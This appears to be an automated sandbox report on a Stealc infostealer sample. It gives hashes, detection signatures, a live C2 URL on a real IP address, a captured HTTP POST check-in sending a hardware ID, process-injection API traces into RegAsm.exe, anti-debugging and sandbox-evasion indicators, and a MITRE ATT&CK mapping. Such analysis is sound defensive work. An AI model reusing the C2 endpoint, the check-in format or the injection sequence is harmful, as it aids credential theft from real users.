Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1508192
MD5:1a3ac0bc9af8e3b8cc72caaf6ba88b9f
SHA1:885872fa24d22d8b9c118174ed3d7b7419e58fe0
SHA256:ab6d864f42680ad444f9a445d3e403cfd1a6355985db933611ec4cb7607b76bf
Tags:exe
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Injects a PE file into a foreign processes
Machine Learning detection for sample
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 5076 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 1A3AC0BC9AF8E3B8CC72CAAF6BA88B9F)
    • conhost.exe (PID: 4044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 3000 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://45.152.113.10/92335b4816f77e90.php"}
SourceRuleDescriptionAuthorStrings
00000003.00000002.2149282715.000000000163A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
    Process Memory Space: file.exe PID: 5076JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: RegAsm.exe PID: 3000JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        Process Memory Space: RegAsm.exe PID: 3000JoeSecurity_StealcYara detected StealcJoe Security
          No Sigma rule has matched
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-09T20:33:59.230715+020020442431Malware Command and Control Activity Detected192.168.2.64971345.152.113.1080TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: http://45.152.113.10/92335b4816f77e90.php1MIAvira URL Cloud: Label: malware
          Source: http://45.152.113.10/mAvira URL Cloud: Label: malware
          Source: http://45.152.113.10/92335b4816f77e90.phpQMAvira URL Cloud: Label: malware
          Source: http://45.152.113.10/SAvira URL Cloud: Label: malware
          Source: http://45.152.113.10/92335b4816f77e90.phpAvira URL Cloud: Label: malware
          Source: http://45.152.113.10/hAvira URL Cloud: Label: malware
          Source: http://45.152.113.10/92335b4816f77e90.phpyMAvira URL Cloud: Label: malware
          Source: http://45.152.113.10/ytAvira URL Cloud: Label: malware
          Source: http://45.152.113.10Avira URL Cloud: Label: malware
          Source: http://45.152.113.10/Avira URL Cloud: Label: malware
          Source: 00000003.00000002.2149282715.000000000163A000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://45.152.113.10/92335b4816f77e90.php"}
          Source: file.exeReversingLabs: Detection: 18%
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
          Source: file.exeJoe Sandbox ML: detected
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49713 -> 45.152.113.10:80
          Source: Malware configuration extractorURLs: http://45.152.113.10/92335b4816f77e90.php
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 45.152.113.10Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /92335b4816f77e90.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKKKJJJKJKFHJJJJECBHost: 45.152.113.10Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 34 44 32 44 41 38 46 46 42 44 34 31 30 36 38 35 34 30 37 36 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 2d 2d 0d 0a Data Ascii: ------KJKKKJJJKJKFHJJJJECBContent-Disposition: form-data; name="hwid"84D2DA8FFBD41068540764------KJKKKJJJKJKFHJJJJECBContent-Disposition: form-data; name="build"default------KJKKKJJJKJKFHJJJJECB--
          Source: Joe Sandbox ViewIP Address: 45.152.113.10 45.152.113.10
          Source: Joe Sandbox ViewASN Name: CODECCLOUD-AS-APCodecCloudHKLimitedHK CODECCLOUD-AS-APCodecCloudHKLimitedHK
          Source: unknownTCP traffic detected without corresponding DNS query: 45.152.113.10
          Source: unknownTCP traffic detected without corresponding DNS query: 45.152.113.10
          Source: unknownTCP traffic detected without corresponding DNS query: 45.152.113.10
          Source: unknownTCP traffic detected without corresponding DNS query: 45.152.113.10
          Source: unknownTCP traffic detected without corresponding DNS query: 45.152.113.10
          Source: unknownTCP traffic detected without corresponding DNS query: 45.152.113.10
          Source: unknownTCP traffic detected without corresponding DNS query: 45.152.113.10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004062D0 InternetOpenA,InternetConnectA,HttpSendRequestA,InternetReadFile,3_2_004062D0
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 45.152.113.10Connection: Keep-AliveCache-Control: no-cache
          Source: unknownHTTP traffic detected: POST /92335b4816f77e90.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKKKJJJKJKFHJJJJECBHost: 45.152.113.10Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 34 44 32 44 41 38 46 46 42 44 34 31 30 36 38 35 34 30 37 36 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 2d 2d 0d 0a Data Ascii: ------KJKKKJJJKJKFHJJJJECBContent-Disposition: form-data; name="hwid"84D2DA8FFBD41068540764------KJKKKJJJKJKFHJJJJECBContent-Disposition: form-data; name="build"default------KJKKKJJJKJKFHJJJJECB--
          Source: RegAsm.exe, 00000003.00000002.2149282715.000000000163A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.152.113.10
          Source: RegAsm.exe, 00000003.00000002.2149282715.000000000168E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2149282715.000000000163A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.152.113.10/
          Source: RegAsm.exe, 00000003.00000002.2149282715.000000000168E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2149282715.0000000001681000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.152.113.10/92335b4816f77e90.php
          Source: RegAsm.exe, 00000003.00000002.2149282715.0000000001681000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.152.113.10/92335b4816f77e90.php1MI
          Source: RegAsm.exe, 00000003.00000002.2149282715.0000000001681000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.152.113.10/92335b4816f77e90.phpQM
          Source: RegAsm.exe, 00000003.00000002.2149282715.0000000001681000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.152.113.10/92335b4816f77e90.phpyM
          Source: RegAsm.exe, 00000003.00000002.2149282715.000000000168E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.152.113.10/S
          Source: RegAsm.exe, 00000003.00000002.2149282715.000000000163A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.152.113.10/h
          Source: RegAsm.exe, 00000003.00000002.2149282715.000000000168E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.152.113.10/m
          Source: RegAsm.exe, 00000003.00000002.2149282715.000000000168E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.152.113.10/yt
          Source: RegAsm.exe, 00000003.00000002.2149282715.000000000168E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.152.113.101
          Source: file.exeString found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
          Source: file.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
          Source: file.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
          Source: file.exeString found in binary or memory: http://crl.entrust.net/2048ca.crl0
          Source: file.exeString found in binary or memory: http://crl.entrust.net/ts1ca.crl0
          Source: file.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
          Source: file.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
          Source: file.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
          Source: file.exeString found in binary or memory: http://ocsp.digicert.com0
          Source: file.exeString found in binary or memory: http://ocsp.digicert.com0A
          Source: file.exeString found in binary or memory: http://ocsp.entrust.net02
          Source: file.exeString found in binary or memory: http://ocsp.entrust.net03
          Source: file.exeString found in binary or memory: http://www.digicert.com/CPS0
          Source: file.exeString found in binary or memory: http://www.entrust.net/rpa03
          Source: file.exeString found in binary or memory: https://www.entrust.net/rpa0

          System Summary

          barindex
          Source: file.exe, MoveAngles.csLarge array initialization: MoveAngles: array initializer size 192000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00404610 appears 317 times
          Source: file.exeStatic PE information: invalid certificate
          Source: file.exe, 00000000.00000000.2131579112.0000000000624000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVQP.exeX vs file.exe
          Source: file.exe, 00000000.00000002.2135691458.0000000000C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
          Source: file.exeBinary or memory string: OriginalFilenameVQP.exeX vs file.exe
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@4/1@0/1
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.logJump to behavior
          Source: C:\Users\user\Desktop\file.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4044:120:WilError_03
          Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: file.exeReversingLabs: Detection: 18%
          Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041BA2C LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,3_2_0041BA2C
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F70988 push ss; retn 5400h0_2_00F70A6A
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F704F1 pushad ; retn 0000h0_2_00F704F2
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F70978 push ss; retn 0000h0_2_00F7097A
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0291286C push ebp; ret 0_2_02912890
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041A9F5 push ecx; ret 3_2_0041AA08
          Source: file.exeStatic PE information: section name: .text entropy: 7.9902895044889775
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory allocated: F70000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory allocated: 2910000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory allocated: 4910000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\file.exe TID: 1268Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00401160 GetSystemInfo,3_2_00401160
          Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: RegAsm.exe, 00000003.00000002.2149282715.000000000169D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWe
          Source: RegAsm.exe, 00000003.00000002.2149282715.000000000169D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2149282715.000000000163A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: RegAsm.exe, 00000003.00000002.2149282715.000000000163A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
          Source: RegAsm.exe, 00000003.00000002.2149282715.000000000163A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware+
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0041ACFA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00404610 VirtualProtect ?,00000004,00000100,000000003_2_00404610
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041BA2C LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,3_2_0041BA2C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00419160 mov eax, dword ptr fs:[00000030h]3_2_00419160
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00404610 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,GetProcessHeap,RtlAllocateHeap,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,strlen,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,VirtualProtect,3_2_00404610
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041C8D9 SetUnhandledExceptionFilter,3_2_0041C8D9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0041ACFA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041A718 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0041A718
          Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 5076, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3000, type: MEMORYSTR
          Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02912439 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_02912439
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41E000Jump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42B000Jump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63E000Jump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1063008Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004172F0 GetUserNameA,3_2_004172F0
          Source: file.exe, 00000000.00000002.2135691458.0000000000CB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avp.exe
          Source: file.exe, 00000000.00000002.2135691458.0000000000CB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AVP.exe

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 00000003.00000002.2149282715.000000000163A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3000, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 00000003.00000002.2149282715.000000000163A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3000, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Native API
          1
          DLL Side-Loading
          411
          Process Injection
          1
          Masquerading
          OS Credential Dumping31
          Security Software Discovery
          Remote ServicesData from Local System2
          Ingress Tool Transfer
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          DLL Side-Loading
          11
          Disable or Modify Tools
          LSASS Memory31
          Virtualization/Sandbox Evasion
          Remote Desktop ProtocolData from Removable Media2
          Non-Application Layer Protocol
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
          Virtualization/Sandbox Evasion
          Security Account Manager1
          Account Discovery
          SMB/Windows Admin SharesData from Network Shared Drive12
          Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook411
          Process Injection
          NTDS1
          System Owner/User Discovery
          Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information
